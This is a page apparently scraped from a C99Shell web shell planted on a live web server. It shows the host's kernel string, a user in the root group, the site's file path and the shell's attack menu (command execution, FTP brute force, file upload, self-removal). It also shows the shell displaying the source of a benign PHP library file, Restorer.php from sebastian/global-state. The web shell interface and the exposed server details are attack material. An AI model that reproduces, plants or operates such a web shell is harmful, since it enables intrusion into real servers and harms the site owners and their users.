!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/sebastian/global-state/src/   drwxr-xr-x
Free 28.23 GB of 117.98 GB (23.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Restorer.php (3.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types=1);
/*
 * This file is part of sebastian/global-state.
 *
 * (c) Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
namespace SebastianBergmann\GlobalState;

use function 
array_diff;
use function 
array_key_exists;
use function 
array_keys;
use function 
array_merge;
use function 
in_array;
use function 
is_array;
use 
ReflectionClass;
use 
ReflectionProperty;

final class 
Restorer
{
    public function 
restoreGlobalVariables(Snapshot $snapshot): void
    
{
        
$superGlobalArrays $snapshot->superGlobalArrays();

        foreach (
$superGlobalArrays as $superGlobalArray) {
            
$this->restoreSuperGlobalArray($snapshot$superGlobalArray);
        }

        
$globalVariables $snapshot->globalVariables();

        foreach (
array_keys($GLOBALS) as $key) {
            if (
$key !== 'GLOBALS' &&
                !
in_array($key$superGlobalArraystrue) &&
                !
$snapshot->excludeList()->isGlobalVariableExcluded($key)) {
                if (
array_key_exists($key$globalVariables)) {
                    
$GLOBALS[$key] = $globalVariables[$key];
                } else {
                    unset(
$GLOBALS[$key]);
                }
            }
        }
    }

    public function 
restoreStaticProperties(Snapshot $snapshot): void
    
{
        
$current    = new Snapshot($snapshot->excludeList(), falsefalsefalsefalsetruefalsefalsefalsefalse);
        
$newClasses array_diff($current->classes(), $snapshot->classes());

        unset(
$current);

        foreach (
$snapshot->staticProperties() as $className => $staticProperties) {
            foreach (
$staticProperties as $name => $value) {
                
$reflector = new ReflectionProperty($className$name);
                
$reflector->setValue(null$value);
            }
        }

        foreach (
$newClasses as $className) {
            
$class    = new ReflectionClass($className);
            
$defaults $class->getDefaultProperties();

            foreach (
$class->getProperties() as $property) {
                if (!
$property->isStatic()) {
                    continue;
                }

                
$name $property->getName();

                if (
$snapshot->excludeList()->isStaticPropertyExcluded($className$name)) {
                    continue;
                }

                if (!isset(
$defaults[$name])) {
                    continue;
                }

                
$property->setValue(null$defaults[$name]);
            }
        }
    }

    private function 
restoreSuperGlobalArray(Snapshot $snapshotstring $superGlobalArray): void
    
{
        
$superGlobalVariables $snapshot->superGlobalVariables();

        if (isset(
$GLOBALS[$superGlobalArray], $superGlobalVariables[$superGlobalArray]) &&
            
is_array($GLOBALS[$superGlobalArray])) {
            
$keys array_keys(
                
array_merge(
                    
$GLOBALS[$superGlobalArray],
                    
$superGlobalVariables[$superGlobalArray],
                ),
            );

            foreach (
$keys as $key) {
                if (isset(
$superGlobalVariables[$superGlobalArray][$key])) {
                    
$GLOBALS[$superGlobalArray][$key] = $superGlobalVariables[$superGlobalArray][$key];
                } else {
                    unset(
$GLOBALS[$superGlobalArray][$key]);
                }
            }
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--